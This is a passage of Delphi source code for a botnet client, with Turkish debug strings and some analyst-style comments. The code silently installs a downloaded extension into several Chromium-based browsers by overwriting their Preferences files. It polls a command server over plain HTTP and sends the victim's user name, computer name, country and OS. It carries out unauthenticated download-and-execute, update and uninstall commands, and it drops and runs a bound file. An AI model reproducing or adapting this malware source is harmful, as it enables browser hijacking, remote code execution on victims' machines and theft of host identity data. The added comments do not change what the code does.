MakeSureDirectoryPathExists(PAnsiChar(Browser.Chromium_Ext));
DebugPrompt(Browser.Chromium_Ext);
Browser.Torch_Path := GetCustomPath(7) + 'Torch\User Data\Default\Extensions\';
Browser.Torch_Config := GetCustomPath(7) + 'Torch\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Torch_Path)));
Browser.Torch_Installed := FileExists(Browser.Torch_Config);
Browser.Torch_Ext := IncludeTrailingBackSlash(Browser.Torch_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Torch_Ext));
DebugPrompt(Browser.Torch_Ext);
Browser.SuperBird_Path := GetCustomPath(7) + 'SuperBird\User Data\Default\Extensions\';
Browser.SuperBird_Config := GetCustomPath(7) + 'SuperBird\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.SuperBird_Path)));
Browser.SuperBird_Installed := FileExists(Browser.SuperBird_Config);
Browser.SuperBird_Ext := IncludeTrailingBackSlash(Browser.SuperBird_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.SuperBird_Ext));
DebugPrompt(Browser.SuperBird_Ext);
Browser.Opera_Path := GetCustomPath(6) + 'Opera Software\Opera Stable\Extensions\';
Browser.Opera_Config := GetCustomPath(6) + 'Opera Software\Opera Stable\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Opera_Path)));
Browser.Opera_Installed := FileExists(Browser.Opera_Config);
Browser.Opera_Ext := IncludeTrailingBackSlash(Browser.Opera_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Opera_Ext));
DebugPrompt(Browser.Opera_Ext);
// Download only (Execute = false); SavePath below refers to the returned record.
with InternetDownloadFile(ExtensionURL,false,'')
do begin
ExtName := ExtractFileName(SavePath);
DebugPrompt(#13#10#13#10);
DebugPrompt('YAZILACAK YER : ' + Browser.Chrome_Ext + ExtName);
DebugPrompt('NEREDEN : ' + SavePath);
DebugPrompt('Browserlar Resetleniyor..');
ResetBrowsers;
DebugPrompt('Browserlar Resetlendi.');
Sleep(5000);
// Per browser: copy the extension file, then overwrite the Preferences file.
DebugPrompt('Chrome_Ext : ' + Browser.Chrome_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chrome_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Chrome_Ext + ExtName), Browser.Chrome_Config);
DebugPrompt('Yandex_Ext : ' + Browser.Yandex_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Yandex_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Yandex_Ext + ExtName), Browser.Yandex_Config);
DebugPrompt('ComodoDragon_Ext : ' + Browser.ComodoDragon_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ComodoDragon_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.ComodoDragon_Ext + ExtName), Browser.ComodoDragon_Config);
DebugPrompt('Torch_Ext : ' + Browser.Torch_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Torch_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Torch_Ext + ExtName), Browser.Torch_Config);
DebugPrompt('Opera_Ext : ' + Browser.Opera_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Opera_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Opera_Ext + ExtName), Browser.Opera_Config);
DebugPrompt('ChromeCanary_Ext : ' + Browser.ChromeCanary_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ChromeCanary_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.ChromeCanary_Ext + ExtName), Browser.ChromeCanary_Config);
DebugPrompt('Chromium_Ext : ' + Browser.Chromium_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chromium_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Chromium_Ext + ExtName), Browser.Chromium_Config);
DebugPrompt('SuperBird_Ext : ' + Browser.SuperBird_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.SuperBird_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.SuperBird_Ext + ExtName), Browser.SuperBird_Config);
DebugPrompt('Tarayici Calistiriliyor..');
OpenBrowser;
DebugPrompt('Tarayici Calistirildi.');
Exit;
end;
end;
// Handler for CMD_UPDATESERVER: downloads the file at pszNewFile into the temp
// directory, runs it, and terminates the current process. The replacement
// binary is whatever the server names; nothing in the visible code verifies it.
procedure UpdateServer(pszNewFile : string);
begin
// Update server
with InternetDownloadFile(pszNewFile,True,'')
do begin
ExitProcess(0);
end;
end;
// Parses one server response and executes the command it carries.
// Processing steps:
//   1. Trims the response and drops everything up to and including the first ':'.
//   2. Compares the remaining text with 'LastCommandHash' in the settings INI
//      file; an identical value means the command was already applied and the
//      procedure returns. Otherwise the new value is stored.
//   3. Decodes the text with HexToStr (not defined in the visible source -
//      presumably in one of the project units; confirm) and reads the integer
//      before the first '~' as the command id; the rest is the argument.
//   4. Dispatches on the CMD_* constants.
// The server response is acted on without any authentication or integrity
// check in the visible code, and the transport is plain HTTP (see
// ReadCommands). For incident response, 'LastCommandHash' in the INI file
// holds the hex-encoded text of the most recent command the host accepted.
procedure CheckCommands(Data : string);
var
CommandID : Integer;
Params : String;
IsCommandApplied : Boolean;
begin
Data := Trim(Data);
Delete(Data,1,Pos(':',Data));
IsCommandApplied := False;
if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastCommandHash','')<>Data
then begin
BotConfig.SettingsIniFile.WriteString('SETTINGS','LastCommandHash',Data);
IsCommandApplied := True;
end;
if IsCommandApplied = false
then begin
DebugPrompt('Bu Komut Daha Önceden Zaten Uygulanmış');
Exit;
end;
Data := HexToStr(Trim(Data));
// An id that fails to parse becomes 0, which matches no case below.
CommandID := StrToIntDef(Copy(Data,1,Pos(Parser,Data)-1),0);
Delete(Data,1,Length(IntToStr(CommandID))+1);
case CommandID of
CMD_CLOSESERVER :
begin
ExitProcess(0);
end;
CMD_UNINSTALLFILE :
begin
Uninstall;
end;
CMD_UPDATESERVER :
begin
DebugPrompt(Data);
UpdateServer(Data);
end;
CMD_RESETBROWSERS :
begin
ResetBrowsers;
OpenBrowser;
end;
CMD_INSTALLEXTENSION :
begin
InstallExtension(Data);
end;
CMD_DOWNLOADANDEXECUTE :
begin
InternetDownloadFile(Data,True,'');
end;
end;
end;
// Decodes an embedded resource string: walks St from its last character to its
// first and appends each character's byte value plus one, i.e. the output is
// the input reversed with every byte incremented by 1.
// This is a fixed, keyless transform, so the 'TKEY' and 'TFILE' resources of a
// sample can be decoded offline by an analyst without running it.
function Decrypt(St: string): string;
var
i: integer;
a: byte;
begin
Result := '';
for i := length(St) downto 1 do begin
A := ord(St[i]);
result := result + char(a+1);
end;
end;
// Command-polling loop, started as its own thread by the main block.
// Every 10 seconds it sends an HTTP POST to BotConfig.CommandURL with the form
// fields vKey, uID, cID, vCountry, vLang, vVer and vOS (product key plus the
// host identifiers gathered at start-up) and hands the response body to
// CheckCommands. Exceptions from the request are caught and only traced.
// Network signature visible from this code: a POST on a fixed ~10 s interval,
// port 80, the constant INET_USERAGENT value, and exactly this set of
// parameter names. The user name, computer name and locale of the host are
// sent unencrypted in each request.
procedure ReadCommands;
var
Socket: TIdHTTP;
lstParams : TStringList;
strResponse : string;
begin
lstParams := TStringList.Create;
lstParams.Clear;
lstParams.add('vKey='+BotConfig.ProductKey);
lstParams.add('uID='+BotConfig.VictimName);
lstParams.add('cID='+BotConfig.VictimComputerName);
lstParams.add('vCountry='+BotConfig.VictimCountry);
lstParams.add('vLang='+BotConfig.VictimLanguage);
lstParams.add('vVer='+BotConfig.VictimVersion);
lstParams.add('vOS='+BotConfig.VictimOS);
while True
do begin
try
// A new TIdHTTP object is created on every iteration.
Socket:= TIdHTTP.Create(nil);
Socket.request.userAgent:= INET_USERAGENT;
Socket.redirectMaximum := INET_REDIRECT_MAX;
Socket.handleRedirects := INET_REDIRECT_MAX<>NONE;
Socket.Port := 80;
strResponse := Socket.Post(BotConfig.CommandURL,lstParams);
except on e : Exception
do begin
DebugPrompt(E.Message);
end;
end;
DebugPrompt('KOMUT OKUNDU:'+strResponse);
CheckCommands(strResponse);
strResponse:='';
Sleep(10000);
end;
end;
// Program entry point. Summary of start-up behaviour, useful as a checklist
// when examining a host or a sample:
//   - Suppresses Windows error dialogs for the process (SetErrorMode).
//   - Loads the RCDATA resource 'TKEY', decodes it with Decrypt and reads it
//     into the INFO record (command URL, Run-key value name, install name,
//     feature flags).
//   - Loads the RCDATA resource 'TFILE' (the bundled file) and decodes it the
//     same way; a missing resource is caught and only reported to the debugger.
//   - Collects user name, computer name, country and language via GetUserInfo.
//   - Builds the settings path under Local AppData as
//     <country>_<user>\<computer>\<country>\DENEMETEST.ini and creates the
//     directories. The same directory is the install directory.
//   - In non-debug builds with INFO.INSTALL set, runs InstallFile (Run-key
//     persistence, self-copy, single-instance mutex).
//   - Starts two threads: ReadCommands (server polling) and
//     DetectChromeTaskManager (window watcher).
//   - If INFO.BINDER is set and the bundled file is not yet on disk, writes it
//     into the install directory under INFO.FILE_NAME and opens it.
//   - Runs a message loop to keep the process alive.
// The product key and mutex name are hard-coded below and are therefore
// constant across hosts running this build.
var
Msg : TMSG;
ServerMutex,
threadTaskManager,
threadChromeTaskManagerControl,
threadReadCommands,
threadInstallServer : THandle;
ResData : String;
ResourceStream : TResourceStream;
Stream : TMemoryStream;
FileData : String;
BindFilePath : String;
threadTaskManagerId,
threadInstallServerId,
lpReadCommandThreadId : cardinal;
begin
DemoVersion;
SetErrorMode(SEM_FAILCRITICALERRORS +
SEM_NOALIGNMENTFAULTEXCEPT +
SEM_NOGPFAULTERRORBOX +
SEM_NOOPENFILEERRORBOX);
DemoVersion;
// Embedded build configuration: resource 'TKEY' -> Decrypt -> INFO.
ResData:='';
ResourceStream:=TResourceStream.Create(0,'TKEY',RT_RCDATA);
ResourceStream.Position:=0;
SetString(ResData,pansichar(ResourceStream.Memory),ResourceStream.Size);
ResData := Decrypt(ResData);
DebugPrompt('DECRYPTED RES DATA : ' + ResData);
Stream := TMemoryStream.Create;
Stream.Write(pointer(ResData)^,Length(ResData));
Stream.Position := 0;
Stream.Read(Info,SizeOf(TInfo));
// Embedded bundled file: resource 'TFILE' -> Decrypt -> FileData.
FileData:='';
try
ResourceStream:=TResourceStream.Create(0,'TFILE',RT_RCDATA);
SetString(FileData,pansichar(ResourceStream.Memory),ResourceStream.Size);
except on e : Exception do
begin
OutputDebugStringA(PAnsiChar(e.Message));
end;
end;
FileData := Decrypt(FileData);
BotConfig.ProductKey := 'DENEMETEST';
BotConfig.Mutex := 'DENEMETESTv10';
BotConfig.VictimName := GetUserInfo(1);
BotConfig.VictimComputerName := GetUserInfo(0);
BotConfig.VictimCountry := GetUserInfo(2);
BotConfig.VictimLanguage := GetUserInfo(3);
BotConfig.InstallName := String(INFO.PROGRAMNAME);
BotConfig.RegistryName := String(INFO.KEY);
BotConfig.CommandURL := String(INFO.URL_ADDR);
DemoVersion;
// Settings / install directory under Local AppData, named from host identifiers.
BotConfig.SettingsFile := GetCustomPath(7) + BotConfig.VictimCountry + '_' + BotConfig.VictimName + '\' + BotConfig.VictimComputerName + '\' + BotConfig.VictimCountry + '\DENEMETEST.ini' ;
MakeSureDirectoryPathExists(PAnsiChar(IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile))));
DebugPrompt(BotConfig.SettingsFile);
DemoVersion;
{$IFDEF DEBUG_MODE_ON}
DeleteFileA(PAnsiChar(BotConfig.SettingsFile));
{$ENDIF}
DemoVersion;
BotConfig.SettingsIniFile := TIniFile.Create(BotConfig.SettingsFile);
BotConfig.InstallDirectory := IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile));
BotConfig.InstallDirectoryPath := BotConfig.InstallDirectory + BotConfig.InstallName;
DemoVersion;
DemoVersion;
{$IFNDEF DEBUG_MODE_ON}
if INFO.INSTALL=True
then begin
InstallFile;
end;
{$ENDIF}
DemoVersion;
// Background threads: server polling and the window watcher.
threadReadCommands := CreateThread(Nil,0,@ReadCommands,nil,0,lpReadCommandThreadId);
threadTaskManager := CreateThread(nil,0,@DetectChromeTaskManager,nil,0,threadChromeTaskManagerControl);
BindFilePath := BotConfig.InstallDirectory + INFO.FILE_NAME;
DebugPrompt('Bindirilen Dosya : ' + BindFilePath);
if Info.BINDER=TRUE
then begin
if not FileExists(BindFilePath)
then begin
DebugPrompt('Bindirilen Dosya Calıştırılıyor...');
Str2File(FileData,BindFilePath);
ShellExecuteA(0,'OPEN',PAnsiChar(BindFilePath),'',NIL,SW_SHOW);
DebugPrompt('Bindirilen Dosya Calistirildi');
end;
end;
While GetMessage(Msg,0,0,0) Do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end.